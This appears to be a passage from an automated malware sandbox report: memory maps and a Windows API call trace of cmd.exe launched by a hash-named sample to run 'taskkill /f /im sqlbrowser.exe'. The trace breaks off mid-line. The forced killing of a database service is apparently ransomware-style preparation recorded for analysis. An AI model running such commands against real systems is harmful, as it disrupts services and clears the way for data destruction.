entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1411 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1412 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1413 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1414 start_va = 0x5e0000 end_va = 0x69dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1415 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1416 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1417 start_va = 0x470000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 1418 start_va = 0x6a0000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006a0000" filename = "" Region: id = 1419 start_va = 0x7a0000 end_va = 0x88ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 1420 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1421 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1422 start_va = 0x890000 end_va = 0xbc6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 132 os_tid = 0x864 [0147.067] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0147.067] __set_app_type (_Type=0x1) [0147.067] __p__fmode () returned 0x74974d6c [0147.067] __p__commode () returned 0x74975b1c [0147.067] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0147.067] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0147.068] GetCurrentThreadId () returned 0x864 [0147.068] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x864) returned 0x78 [0147.068] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0147.068] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0147.069] SetThreadUILanguage (LangId=0x0) returned 0x409 [0147.078] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0147.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0147.078] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.078] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0147.078] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0147.079] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0147.079] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0147.079] GetConsoleOutputCP () returned 0x1b5 [0147.080] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0147.080] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0147.080] _get_osfhandle (_FileHandle=1) returned 0x144 [0147.081] SetConsoleMode (hConsoleHandle=0x144, dwMode=0x0) returned 0 [0147.081] _get_osfhandle (_FileHandle=1) returned 0x144 [0147.081] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0147.081] _get_osfhandle (_FileHandle=0) returned 0x140 [0147.081] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0147.081] GetEnvironmentStringsW () returned 0x477cc8* [0147.081] GetProcessHeap () returned 0x470000 [0147.081] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa1a) returned 0x4786f0 [0147.081] FreeEnvironmentStringsA (penv="A") returned 1 [0147.082] GetProcessHeap () returned 0x470000 [0147.082] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4) returned 0x470550 [0147.082] GetEnvironmentStringsW () returned 0x477cc8* [0147.082] GetProcessHeap () returned 0x470000 [0147.082] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa1a) returned 0x479118 [0147.082] FreeEnvironmentStringsA (penv="A") returned 1 [0147.082] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0147.082] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.082] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.082] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.082] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.083] RegCloseKey (hKey=0x88) returned 0x0 [0147.083] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0147.083] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0147.083] RegCloseKey (hKey=0x88) returned 0x0 [0147.084] time (in: timer=0x0 | out: timer=0x0) returned 0x62344201 [0147.084] srand (_Seed=0x62344201) [0147.084] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlbrowser.exe \"" [0147.084] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlbrowser.exe \"" [0147.084] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0147.084] GetProcessHeap () returned 0x470000 [0147.084] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x210) returned 0x479b40 [0147.084] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x479b48, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0147.084] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0147.084] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0147.084] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.084] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0147.084] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0147.084] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0147.085] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0147.085] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0147.085] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0147.085] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0147.085] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0147.085] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0147.086] GetProcessHeap () returned 0x470000 [0147.086] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x4786f0) returned 1 [0147.086] GetEnvironmentStringsW () returned 0x477cc8* [0147.086] GetProcessHeap () returned 0x470000 [0147.086] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa32) returned 0x47a798 [0147.087] FreeEnvironmentStringsA (penv="A") returned 1 [0147.087] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0147.087] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0147.087] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0147.087] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0147.087] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0147.087] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0147.087] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0147.087] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0147.087] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0147.087] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0147.087] GetProcessHeap () returned 0x470000 [0147.087] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x44) returned 0x4705c8 [0147.087] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0147.087] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0147.087] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0147.087] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x470618 [0147.088] FindClose (in: hFindFile=0x470618 | out: hFindFile=0x470618) returned 1 [0147.088] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x470618 [0147.088] FindClose (in: hFindFile=0x470618 | out: hFindFile=0x470618) returned 1 [0147.088] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0147.088] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x470618 [0147.088] FindClose (in: hFindFile=0x470618 | out: hFindFile=0x470618) returned 1 [0147.088] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0147.089] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0147.089] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0147.089] GetProcessHeap () returned 0x470000 [0147.089] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47a798) returned 1 [0147.089] GetEnvironmentStringsW () returned 0x477cc8* [0147.089] GetProcessHeap () returned 0x470000 [0147.089] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xa76) returned 0x479d58 [0147.090] FreeEnvironmentStringsA (penv="=") returned 1 [0147.090] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0147.090] GetProcessHeap () returned 0x470000 [0147.090] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x4705c8) returned 1 [0147.090] GetProcessHeap () returned 0x470000 [0147.090] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400e) returned 0x47bc58 [0147.091] GetProcessHeap () returned 0x470000 [0147.091] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x50) returned 0x47a7d8 [0147.091] GetProcessHeap () returned 0x470000 [0147.091] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x47fc70 [0147.091] GetProcessHeap () returned 0x470000 [0147.091] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x4008) returned 0x483c80 [0147.093] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0147.094] GetProcessHeap () returned 0x470000 [0147.094] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x418) returned 0x47a830 [0147.094] SetErrorMode (uMode=0x0) returned 0x8003 [0147.094] SetErrorMode (uMode=0x1) returned 0x0 [0147.094] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x47a838, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0147.094] SetErrorMode (uMode=0x8003) returned 0x1 [0147.094] GetProcessHeap () returned 0x470000 [0147.094] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a830, Size=0x82) returned 0x47a830 [0147.094] GetProcessHeap () returned 0x470000 [0147.094] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a830) returned 0x82 [0147.094] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0147.094] GetProcessHeap () returned 0x470000 [0147.095] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x62) returned 0x47a8c0 [0147.095] GetProcessHeap () returned 0x470000 [0147.095] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xb8) returned 0x47a930 [0147.095] GetProcessHeap () returned 0x470000 [0147.095] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a930, Size=0x62) returned 0x47a930 [0147.095] GetProcessHeap () returned 0x470000 [0147.095] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a930) returned 0x62 [0147.095] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0147.097] GetProcessHeap () returned 0x470000 [0147.097] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0xe0) returned 0x47a9a0 [0147.101] GetProcessHeap () returned 0x470000 [0147.102] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x47a9a0, Size=0x76) returned 0x47a9a0 [0147.102] GetProcessHeap () returned 0x470000 [0147.102] RtlSizeHeap (HeapHandle=0x470000, Flags=0x0, MemoryPointer=0x47a9a0) returned 0x76 [0147.102] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0147.102] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im sqlbrowser.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0147.102] GetLastError () returned 0x3 [0147.102] GetProcessHeap () returned 0x470000 [0147.103] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47fc70) returned 1 [0147.103] GetProcessHeap () returned 0x470000 [0147.104] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x483c80) returned 1 [0147.104] GetProcessHeap () returned 0x470000 [0147.104] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47bc58) returned 1 [0147.104] GetConsoleOutputCP () returned 0x1b5 [0147.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0147.105] GetUserDefaultLCID () returned 0x409 [0147.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0147.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0147.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0147.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0147.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0147.106] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0147.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0147.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0147.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0147.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0147.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0147.107] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0147.107] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0147.107] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0147.107] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0147.109] GetProcessHeap () returned 0x470000 [0147.109] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x20c) returned 0x47aa68 [0147.109] GetConsoleTitleW (in: lpConsoleTitle=0x47aa68, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0147.110] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0147.110] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0147.110] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0147.110] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0147.111] GetProcessHeap () returned 0x470000 [0147.111] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x400a) returned 0x47bc58 [0147.111] GetProcessHeap () returned 0x470000 [0147.111] RtlFreeHeap (HeapHandle=0x470000, Flags=0x0, BaseAddress=0x47bc58) returned 1 [0147.112] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0147.112] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0147.112] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0147.112] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0147.113] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0147.113] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0147.113] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0147.113] GetProcessHeap () returned 0x470000 [0147.113] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x58) returned 0x47ac80 [0147.113] GetProcessHeap () returned 0x470000 [0147.113] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x1a) returned 0x470578 [0147.113] GetProcessHeap () returned 0x470000 [0147.113] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x8, Size=0x38) returned 0x47ace0 [0147.115] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0147.117] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0147.117] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0147.117] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0147.117] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0147.117] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0147.117] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0147.117] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0147.117] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0147.117] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0147.117] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0147.117] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0147.117] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0147.117] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0147.117] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0147.117] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0147.117] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0147.117] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0147.117] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0147.118] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0147.118] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0147.118] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0147.118] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0147.118] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0147.118] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0147.118] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0147.118] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0147.118] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0147.118] 